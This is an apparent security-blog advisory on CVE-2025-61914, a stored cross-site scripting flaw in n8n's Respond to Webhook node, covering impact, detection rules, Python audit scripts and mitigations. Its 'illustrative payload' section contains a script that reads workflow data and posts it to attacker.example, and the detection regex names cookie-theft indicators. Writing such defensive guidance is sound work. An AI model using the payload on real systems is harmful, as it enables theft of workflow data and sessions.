CVE-2025-61914: Malicious Webhook Responses Can Execute Code in n8n Editor

Vulnerability Overview

| Field | Details |
|---|---|
| CVE ID | CVE-2025-61914 |
| Vulnerability Name | n8n Stored Cross-Site Scripting via Respond to Webhook Node |
| Vendor / Project | n8n |
| Affected Product | n8n Workflow Automation Platform |
| Affected Versions | All versions prior to 1.114.0 |
| Severity | HIGH |
| CVSS Score | 8.1 (High) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N |
| CWE Classification | CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting) |
| Exploitability | Network-based · Low complexity · Requires authenticated workflow creation permissions · User interaction required |
| Exploit Availability | No public PoC at time of disclosure |
| Patch Status | Fixed in n8n version 1.114.0 |

Vulnerability Description

n8n is an open-source workflow automation platform widely used to integrate services and automate business processes. A stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 1.114.0, specifically related to the “Respond to Webhook” node.

The issue occurs when this node is configured to return HTML responses containing executable JavaScript. Instead of being rendered within the sandboxed iframe introduced in version 1.103.0, the response may execute directly in the top-level browser window. This breaks the intended isolation model.

As a result, a malicious user with permission to create or modify workflows can inject JavaScript that executes in the context of the n8n editor interface. Because this is a stored XSS, the payload persists and can trigger whenever the affected workflow is accessed or executed.


Impact

Successful exploitation may allow an attacker to:

  • Execute arbitrary JavaScript in the n8n editor UI
  • Steal active session cookies or authentication tokens
  • Perform actions on behalf of other users (including administrators)
  • Modify or delete workflows without authorization
  • Access sensitive workflow data, credentials, or environment variables
  • Pivot to further attacks within the automation environment

While the vulnerability requires authenticated access, the impact is elevated due to cross-context execution and persistence.


How This Vulnerability Could Be Exploited

A realistic exploitation path could look like this:

  1. An attacker gains workflow creation or edit permissions (legitimate user, compromised account, or insider).
  2. They configure a Respond to Webhook node to return malicious HTML containing embedded JavaScript.
  3. The workflow is saved and executed or triggered via webhook.
  4. The response renders in the top-level n8n editor window, not the sandbox.
  5. The malicious script executes with the same privileges as the n8n UI session.

Payload (Illustrative)

<script>
fetch('/rest/workflows', { credentials: 'include' })
  .then(r => r.text())
  .then(data => fetch('https://attacker.example/exfil', {
    method: 'POST',
    body: data
  }));
</script>

This type of payload could silently extract sensitive workflow data or hijack user sessions.


MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application |
| Execution | T1059.007 | JavaScript |
| Privilege Escalation | T1078 | Valid Accounts |
| Credential Access | T1555 | Credentials from Web Browsers |
| Collection | T1213 | Data from Information Repositories |
| Defense Evasion | T1027 | Obfuscated Files or Information |

Proof of Concept (PoC) Status

Current Status: No publicly available proof-of-concept code.

  • The issue has not been widely weaponized at the time of disclosure.
  • No exploit code has been observed in public repositories or exploit databases.
  • Given the simplicity of XSS payloads and the popularity of n8n, public PoCs are likely to emerge.
  • Organizations should assume this vulnerability is easily reproducible by any user with workflow permissions.

Detection and Monitoring Guidance

What to Look For

Security teams should monitor for the following indicators:

  • Workflows returning HTML responses from the Respond to Webhook node
  • Inline <script> tags or JavaScript event handlers in webhook responses
  • Unexpected outbound requests from the n8n UI to external domains
  • Unusual workflow modifications by non-administrative users
  • User sessions performing actions without corresponding UI activity

Sample Detection Payloads

Suspicious HTML Indicators

<script>|onerror=|onload=|javascript:|document\.cookie|window\.top

Sample Detection Rules

SIEM / Log-Based Rule (Generic)

IF webhook_response_content CONTAINS "<script"
AND node_type = "Respond to Webhook"
THEN alert severity = High

Reverse Proxy / WAF Rule

Block responses where Content-Type = text/html
AND response body contains executable JavaScript
AND source = n8n webhook endpoint
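The SIEM rule and the indicator pattern above, implemented as an added example in Python (this is not code from the advisory or from the n8n project). It runs the advisory's indicator regex and the node-type check over constructed execution-log records and assigns the severity the rules describe: High when executable JavaScript indicators appear in a text/html response from a Respond to Webhook node, Medium when the indicators appear under another content type, and Low for a plain HTML response that only warrants review. The record field names (workflow, node_type, content_type, body) are assumptions, not n8n's real log schema.

```python
import re

# Indicators taken from the advisory's "Suspicious HTML Indicators" pattern.
SUSPICIOUS_HTML = re.compile(
    r"<script|onerror=|onload=|javascript:|document\.cookie|window\.top",
    re.IGNORECASE,
)

RESPOND_NODE = "Respond to Webhook"

# Constructed sample of n8n execution-log records. The field names are an
# assumption for this example, not n8n's actual log schema.
SAMPLE_RECORDS = [
    {"workflow": "order-status", "node_type": RESPOND_NODE,
     "content_type": "application/json", "body": '{"status": "ok"}'},
    {"workflow": "customer-portal", "node_type": RESPOND_NODE,
     "content_type": "text/html",
     "body": "<html><body><h1>Thanks</h1></body></html>"},
    {"workflow": "customer-portal", "node_type": RESPOND_NODE,
     "content_type": "text/html",
     "body": "<html><script>fetch('/rest/workflows')</script></html>"},
    {"workflow": "image-proxy", "node_type": RESPOND_NODE,
     "content_type": "text/html",
     "body": '<img src=x onerror="alert(document.cookie)">'},
    # Not a Respond to Webhook node: the rule must ignore it even though the
    # body contains a script tag.
    {"workflow": "set-vars", "node_type": "Set", "content_type": "",
     "body": "<script>not a webhook response</script>"},
]


def classify(record):
    """Return (severity, reason) for one record, or None when it is benign."""
    if record.get("node_type") != RESPOND_NODE:
        return None
    body = record.get("body", "")
    ctype = record.get("content_type", "").lower()
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_HTML.finditer(body)})
    if hits:
        # The WAF rule's condition (text/html + executable JavaScript) is the
        # high-severity case; the same indicators under another content type
        # still deserve a look.
        severity = "High" if ctype.startswith("text/html") else "Medium"
        return severity, "executable JavaScript indicators: " + ", ".join(hits)
    if ctype.startswith("text/html"):
        return "Low", "HTML response from Respond to Webhook (review content)"
    return None


def scan_webhook_responses(records):
    """Apply classify() to every record and return the resulting alerts."""
    alerts = []
    for rec in records:
        result = classify(rec)
        if result:
            severity, reason = result
            alerts.append({"workflow": rec["workflow"],
                           "severity": severity, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in scan_webhook_responses(SAMPLE_RECORDS):
        print(f"[{alert['severity']}] {alert['workflow']}: {alert['reason']}")
```

The indicator list is deliberately the advisory's own and will miss obfuscated payloads (see the T1027 mapping above); treat a hit as a trigger for review of the workflow rather than as proof of exploitation, and pair it with the egress and session monitoring listed under Relevant Log Sources.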

Relevant Log Sources

To detect exploitation attempts, collect and analyze:

  • n8n application logs (workflow execution and node output logs)
  • Audit logs for workflow creation and modification
  • Web server / reverse proxy logs in front of n8n
  • Browser security logs (CSP violations, if enabled)
  • Network egress logs for unexpected outbound connections
  • Authentication and session logs for anomalous user behavior

Remediation and Mitigation

Official Patch (Recommended)

Upgrade to n8n version 1.114.0 or later, the release in which this issue is fixed. After upgrading, confirm the running version and review existing workflows for HTML responses as described below.

Temporary Mitigations

If immediate patching is not possible:

  1. Restrict workflow creation and modification to trusted users only
  2. Avoid returning HTML content from the Respond to Webhook node
  3. Enforce Content-Type: application/json wherever possible
  4. Deploy a reverse proxy or HTML sanitizer to strip executable scripts
  5. Review existing workflows for unsafe HTML responses
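Mitigation step 5, using steps 2 and 3 as the checks it applies, as an added example in Python that is not taken from the advisory or from n8n: a static audit of an exported workflow JSON that flags every Respond to Webhook node configured to return text/html or whose response body carries the script indicators listed under Detection and Monitoring Guidance. The node type string n8n-nodes-base.respondToWebhook and the parameter names respondWith, responseBody and options.responseHeaders.entries are assumptions about n8n's export format, and the sample workflow is constructed; verify the layout against an export from your own instance.

```python
import json
import re

# Indicators taken from the advisory's "Suspicious HTML Indicators" pattern.
SUSPICIOUS_HTML = re.compile(
    r"<script|onerror=|onload=|javascript:|document\.cookie|window\.top",
    re.IGNORECASE,
)

# Assumed n8n export layout (node type string and parameter names). Verify
# against a workflow exported from your own instance before relying on it.
RESPOND_NODE_TYPE = "n8n-nodes-base.respondToWebhook"

# Constructed workflow export with three Respond to Webhook nodes and one
# unrelated node.
SAMPLE_WORKFLOW_JSON = json.dumps({
    "name": "customer-portal",
    "nodes": [
        {"name": "Respond JSON", "type": RESPOND_NODE_TYPE,
         "parameters": {"respondWith": "json",
                        "responseBody": "{\"status\": \"ok\"}"}},
        {"name": "Respond HTML page", "type": RESPOND_NODE_TYPE,
         "parameters": {"respondWith": "text",
                        "responseBody": "<html><body><h1>Thanks</h1></body></html>",
                        "options": {"responseHeaders": {"entries": [
                            {"name": "Content-Type", "value": "text/html"}]}}}},
        {"name": "Respond HTML script", "type": RESPOND_NODE_TYPE,
         "parameters": {"respondWith": "text",
                        "responseBody": "<html><script>fetch('/rest/workflows')</script></html>",
                        "options": {"responseHeaders": {"entries": [
                            {"name": "Content-Type", "value": "text/html; charset=utf-8"}]}}}},
        {"name": "Set", "type": "n8n-nodes-base.set", "parameters": {}},
    ],
    "connections": {},
})


def response_content_type(params):
    """Read the Content-Type header configured on the node, if any (assumed layout)."""
    entries = params.get("options", {}).get("responseHeaders", {}).get("entries", [])
    for entry in entries:
        if str(entry.get("name", "")).strip().lower() == "content-type":
            return str(entry.get("value", "")).strip().lower()
    return ""


def audit_workflow(workflow):
    """Return one finding per Respond to Webhook node that violates mitigation 2 or 3."""
    findings = []
    for node in workflow.get("nodes", []):
        if node.get("type") != RESPOND_NODE_TYPE:
            continue
        params = node.get("parameters", {})
        body = str(params.get("responseBody", ""))
        ctype = response_content_type(params)
        issues = []
        if ctype.startswith("text/html"):
            issues.append("returns text/html; prefer application/json (mitigations 2 and 3)")
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS_HTML.finditer(body)})
        if hits:
            issues.append("response body carries executable JavaScript indicators: "
                          + ", ".join(hits))
        if issues:
            findings.append({"node": node.get("name", "?"), "issues": issues})
    return findings


def is_compliant(workflow):
    """True when no Respond to Webhook node in the workflow needs attention."""
    return not audit_workflow(workflow)


if __name__ == "__main__":
    wf = json.loads(SAMPLE_WORKFLOW_JSON)
    for finding in audit_workflow(wf):
        for issue in finding["issues"]:
            print(f"{wf['name']} / {finding['node']}: {issue}")
```

Run it over every exported workflow before and after the upgrade: a clean report on a pre-1.114.0 instance shows which workflows are safe to leave alone, and the flagged nodes are the ones to convert to JSON responses or restrict to trusted editors until the patch is in place.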

Summary

CVE-2025-61914 is a high-impact stored XSS vulnerability in n8n that breaks sandbox isolation and allows arbitrary JavaScript execution in the editor interface. While exploitation requires workflow permissions, the persistence and cross-context execution significantly raise the risk.

Organizations using n8n should upgrade immediately to version 1.114.0, audit existing workflows, and restrict workflow permissions to trusted users. Left unpatched, this issue could enable session hijacking, data exposure, and full workflow compromise.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.